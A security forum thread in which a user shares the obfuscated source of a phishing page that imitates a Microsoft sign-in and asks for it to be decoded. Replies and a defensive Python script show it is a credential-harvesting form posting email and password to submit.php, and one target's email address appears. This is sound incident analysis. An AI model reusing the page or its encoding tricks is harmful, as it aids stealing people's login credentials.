
malicious encoded javascript in website source code

Hi,

Can you decrypt these code lines seen in a recent phishing campaign hitting us?

Partially base64 encoded javascript, variables for something called spoguestaccess which makes me nervous and so on.

What does it do? Download payload? Currently not detected by Intercept-X

PS: also have a case open for this

sourcecode1.txt

sourcecode2.txt

<!DOCTYPE html>
<html>
<head>
	<title>&#x53;&#x69;&#x67;&#x6E;&#x20;&#x69;&#x6E;&#x20;&#x74;&#x6F;&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74;</title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
	<meta name="robots" content "none">
	<meta name="Googlebot" content="nofollow">
	<meta name="robots" content "noindex, nofollow">
	<link rel="shortcut icon" type="icon" href="images/favicon.png">
	<link rel="stylesheet" type="text/css" href="style.css">
	<script type="text/javascript" src="js/jquery.js"></script>	
	
</head>

<body>
<script type="text/javascript">
<!--
document.write(unescape('%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%6F%76%65%72%6C%61%79%22%3E%0A%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%6C%6F%67%69%6E%2D%62%6F%78%22%3E%0A%09%09%09%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%73%2F%6D%73%2D%6C%6F%67%6F%2D%76%32%2E%6A%70%67%22%20%61%6C%74%3D%22%6C%6F%67%6F%22%3E%0A%09%09%09%3C%64%69%76%20%69%64%3D%22%69%64%65%6E%74%69%74%79%22%20%63%6C%61%73%73%3D%22%69%64%65%6E%74%69%74%79%2D%62%61%6E%6E%65%72%22%3E'));
//-->
</script>
			
				<div id="identity-name" class="identity">
					&nbsp;&nbsp;&nbsp;<img src="images/arrow.png" alt="arrow">&nbsp;&nbsp;&nbsp;&nbsp;golllel@byom.de				</div>
				
				
			</div>

			<h2 id="title" style="color:#231E17;"><strong>&#x45;&#x6E;&#x74;&#x65;&#x72;&#x20;&#x70;&#x61;&#x73;&#x73;&#x77;&#x6F;&#x72;&#x64;</strong></h2>
			<p id="message" class="message"></p>

<script type="text/javascript">
<!--
document.write(unescape('%09%09%09%3C%64%69%76%20%69%64%3D%22%6C%6F%61%64%65%72%22%20%63%6C%61%73%73%3D%22%6C%6F%61%64%65%72%20%68%69%64%64%65%6E%22%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%3C%2F%64%69%76%3E'));
//-->
</script>

			<form action="submit.php" method="post">
				<input type="hidden" id="email" name="email" value="golllel@byom.de">
<script type="text/javascript">
<!--
document.write(unescape('%09%09%09%09%3C%69%6E%70%75%74%20%69%64%3D%22%70%61%73%73%77%6F%72%64%22%20%74%79%70%65%3D%22%70%61%73%73%77%6F%72%64%22%20%6E%61%6D%65%3D%22%70%61%73%73%77%6F%72%64%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%50%61%73%73%77%6F%72%64%22%20%72%65%71%75%69%72%65%64%20%61%75%74%6F%66%6F%63%75%73%3E%0A%09%09%09%09%0A%09%09%09%3C%62%72%3E%0A%0A%09%09%09%3C%64%69%76%20%69%64%3D%22%67%72%6F%75%70%32%22%3E%0A%09%09%09%09%0A%09%09%09%09%3C%73%6D%61%6C%6C%20%69%64%3D%22%66%70%73%22%3E%3C%61%20%68%72%65%66%3D%22%23%22%20%63%6C%61%73%73%3D%22%66%61%64%65%22%3E%26%23%78%34%36%3B%26%23%78%36%46%3B%26%23%78%37%32%3B%26%23%78%36%37%3B%26%23%78%36%46%3B%26%23%78%37%34%3B%26%23%78%32%30%3B%26%23%78%36%44%3B%26%23%78%37%39%3B%26%23%78%32%30%3B%26%23%78%37%30%3B%26%23%78%36%31%3B%26%23%78%37%33%3B%26%23%78%37%33%3B%26%23%78%37%37%3B%26%23%78%36%46%3B%26%23%78%37%32%3B%26%23%78%36%34%3B%3C%2F%61%3E%3C%2F%73%6D%61%6C%6C%3E%0A%09%09%09%09%3C%62%72%3E%0A%09%09%09%09%3C%62%72%3E%0A%09%09%09%09%3C%62%72%3E%0A%09%09%09%0A%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%3C%69%6E%70%75%74%20%69%64%3D%22%73%69%67%6E%69%6E%22%20%74%79%70%65%3D%22%73%75%62%6D%69%74%22%20%6E%61%6D%65%3D%22%73%69%67%6E%69%6E%22%20%76%61%6C%75%65%3D%22%53%69%67%6E%20%69%6E%22%3E%0A%09%09%09%3C%2F%66%6F%72%6D%3E%0A%09%09%3C%2F%64%69%76%3E%0A%09%3C%2F%64%69%76%3E%0A%0A%09%3C%66%6F%6F%74%65%72%3E%0A%09%09%3C%75%6C%3E%0A%09%09%09%3C%6C%69%3E%3C%61%20%68%72%65%66%3D%22%23%22%3E%26%23%78%35%30%3B%26%23%78%37%32%3B%26%23%78%36%39%3B%26%23%78%37%36%3B%26%23%78%36%31%3B%26%23%78%36%33%3B%26%23%78%37%39%3B%20%26%20%26%23%78%36%33%3B%26%23%78%36%46%3B%26%23%78%36%46%3B%26%23%78%36%42%3B%26%23%78%36%39%3B%26%23%78%36%35%3B%26%23%78%37%33%3B%3C%2F%61%3E%3C%2F%6C%69%3E%0A%09%09%09%3C%6C%69%3E%3C%61%20%68%72%65%66%3D%22%23%22%3E%26%23%78%35%34%3B%26%23%78%36%35%3B%26%23%78%37%32%3B%26%23%78%36%44%3B%26%23%78%37%33%3B%26%23%78%32%30%3B%26%23%78%36%46%3B%26%23%78%36%36%3B%26%23%78%32%30%3B%26%23%78%37%35%3B%26%23%78%37%33%3B%26%23%78%36%35%3B%3C%2F%61%3E%3C%2F%6C%69%3E%0A%09%09%09%3C%6C%69%3E%3C%61%3E%26%63%6F%70%79%3B%26%23%78%33%32%3B%26%23%78%33%30%3B%26%23%78%33%32%3B%26%23%78%33%30%3B%26%23%78%32%30%3B%26%23%78%34%44%3B%26%23%78%36%39%3B%26%23%78%36%33%3B%26%23%78%37%32%3B%26%23%78%36%46%3B%26%23%78%37%33%3B%26%23%78%36%46%3B%26%23%78%36%36%3B%26%23%78%37%34%3B%3C%2F%61%3E%3C%2F%6C%69%3E%0A%09%09%3C%2F%75%6C%3E'));
//-->
</script>
	</footer>

</body>
</html>

Regards



  • I think sourcecode1 is the more interesting file. Don't know why sourcecode2 is automatically extended here.

  • The document.write sections are just parts of the web page.  I guess to obfuscate the form.  E.g.


    document.write 1

    <div class="overlay">
    <div class="login-box">
    <img src="images/ms-logo-v2.jpg" alt="logo">
    <div id="identity" class="identity-banner">

    document.write 2

    <div id="loader" class="loader hidden">
    <div class="circle"></div>
    <div class="circle"></div>
    <div class="circle"></div>
    <div class="circle"></div>
    <div class="circle"></div>
    </div>

    document.write 3

    <input id="password" type="password" name="password" placeholder="Password" required autofocus>

    <br>

    <div id="group2">

    <small id="fps"><a href="#" class="fade">&#x46;&#x6F;&#x72;&#x67;&#x6F;&#x74;&#x20;&#x6D;&#x79;&#x20;&#x70;&#x61;&#x73;&#x73;&#x77;&#x6F;&#x72;&#x64;</a></small>
    <br>
    <br>
    <br>

    </div>
    <input id="signin" type="submit" name="signin" value="Sign in">

    </form>
    </div>
    </div>

    <footer>
    <ul>
    <li><a href="#">&#x50;&#x72;&#x69;&#x76;&#x61;&#x63;&#x79; & &#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x73;</a></li>
    <li><a href="#">&#x54;&#x65;&#x72;&#x6D;&#x73;&#x20;&#x6F;&#x66;&#x20;&#x75;&#x73;&#x65;</a></li>
    <li><a>&copy;&#x32;&#x30;&#x32;&#x30;&#x20;&#x4D;&#x69;&#x63;&#x72;&#x6F;&#x73;&#x6F;&#x66;&#x74;</a></li>
    </ul>

    ==

    You can put these all together to get an idea of the page.

  • I suppose going a little further, the other "strings" are:

    The title:
    &#x53;&#x69;&#x67;&#x6E;&#x20;&#x69;&#x6E;&#x20;&#x74;&#x6F;&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74; =  "Sign in to your account" 

    &#x45;&#x6E;&#x74;&#x65;&#x72;&#x20;&#x70;&#x61;&#x73;&#x73;&#x77;&#x6F;&#x72;&#x64; = Enter password

    &#x46;&#x6F;&#x72;&#x67;&#x6F;&#x74;&#x20;&#x6D;&#x79;&#x20;&#x70;&#x61;&#x73;&#x73;&#x77;&#x6F;&#x72;&#x64; = Forgot my password

    &#x50;&#x72;&#x69;&#x76;&#x61;&#x63;&#x79; & &#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x73; = Privacy & cookies

    &#x54;&#x65;&#x72;&#x6D;&#x73;&#x20;&#x6F;&#x66;&#x20;&#x75;&#x73;&#x65; = Terms of use

    &copy;&#x32;&#x30;&#x32;&#x30;&#x20;&#x4D;&#x69;&#x63;&#x72;&#x6F;&#x73;&#x6F;&#x66;&#x74; = ©2020 Microsoft
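As an added example (not code from the thread or its participants), a small Python triage script that does mechanically what the two replies above did by hand: it inlines the percent-encoded document.write() fragments, decodes the &#x..; character references (including the ones nested inside the percent-encoded layer), and then reports where the form posts and which inputs it carries. The page it runs on is a constructed excerpt in the same shape as sourcecode2.txt, with a placeholder address instead of the real one.

```python
import re
from html import unescape as html_unescape
from urllib.parse import unquote

# Constructed excerpt (not the posted file) in the same shape as sourcecode2.txt:
# percent-encoded document.write() fragments plus &#x..; numeric character references,
# some of them nested inside the percent-encoded layer. The address is a placeholder.
SAMPLE = r"""<title>&#x53;&#x69;&#x67;&#x6E;&#x20;&#x69;&#x6E;&#x20;&#x74;&#x6F;&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74;</title>
<form action="submit.php" method="post">
<input type="hidden" id="email" name="email" value="victim@example.invalid">
<script type="text/javascript">
<!--
document.write(unescape('%3C%69%6E%70%75%74%20%69%64%3D%22%70%61%73%73%77%6F%72%64%22%20%74%79%70%65%3D%22%70%61%73%73%77%6F%72%64%22%20%6E%61%6D%65%3D%22%70%61%73%73%77%6F%72%64%22%3E%0A%3C%73%6D%61%6C%6C%20%69%64%3D%22%66%70%73%22%3E%3C%61%20%68%72%65%66%3D%22%23%22%3E%26%23%78%34%36%3B%26%23%78%36%46%3B%26%23%78%37%32%3B%26%23%78%36%37%3B%26%23%78%36%46%3B%26%23%78%37%34%3B%26%23%78%32%30%3B%26%23%78%36%44%3B%26%23%78%37%39%3B%26%23%78%32%30%3B%26%23%78%37%30%3B%26%23%78%36%31%3B%26%23%78%37%33%3B%26%23%78%37%33%3B%26%23%78%37%37%3B%26%23%78%36%46%3B%26%23%78%37%32%3B%26%23%78%36%34%3B%3C%2F%61%3E%3C%2F%73%6D%61%6C%6C%3E'));
//-->
</script>
<input id="signin" type="submit" name="signin" value="Sign in">
</form>"""

# Matches the exact <script><!-- document.write(unescape('...')); //--></script> pattern
# used on the page; the captured group is the percent-encoded markup.
SCRIPT_RE = re.compile(
    r"<script[^>]*>\s*<!--\s*document\.write\(unescape\('([^']*)'\)\);\s*//-->\s*</script>")

def inline_document_writes(html):
    """Replace each document.write(unescape('...')) script with the markup it would write.
    unquote() decodes %XX the same way JS unescape() does for the ASCII range used here."""
    return SCRIPT_RE.sub(lambda m: unquote(m.group(1)), html)

def deobfuscate(html):
    """Layer 1: percent-encoding inside document.write; layer 2: &#x..; character references."""
    return html_unescape(inline_document_writes(html))

def summarize_form(html):
    """Where does the form post, and which inputs does it carry? Run on deobfuscated markup."""
    action = re.search(r'<form\b[^>]*\baction="([^"]*)"', html)
    fields = []
    for tag in re.findall(r"<input\b[^>]*>", html):
        name = re.search(r'\bname="([^"]*)"', tag)
        kind = re.search(r'\btype="([^"]*)"', tag)
        fields.append((name.group(1) if name else None, kind.group(1) if kind else "text"))
    return (action.group(1) if action else None), fields

def visible_strings(html):
    """Text between tags, i.e. what the victim actually reads once both layers are decoded."""
    return [s.strip() for s in re.findall(r">([^<]+)<", html) if s.strip()]

if __name__ == "__main__":
    page = deobfuscate(SAMPLE)
    print(page)
    print(summarize_form(page), visible_strings(page))
```

Running it on the real sourcecode2.txt gives the same answer the replies reached: the only outbound action is the form post of email and password to submit.php, with no downloader in the decoded markup.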

  • Thanks a lot for your time and effort checking the code lines. So it doesn't look too bad. I guess there was no hidden downloader on those pages.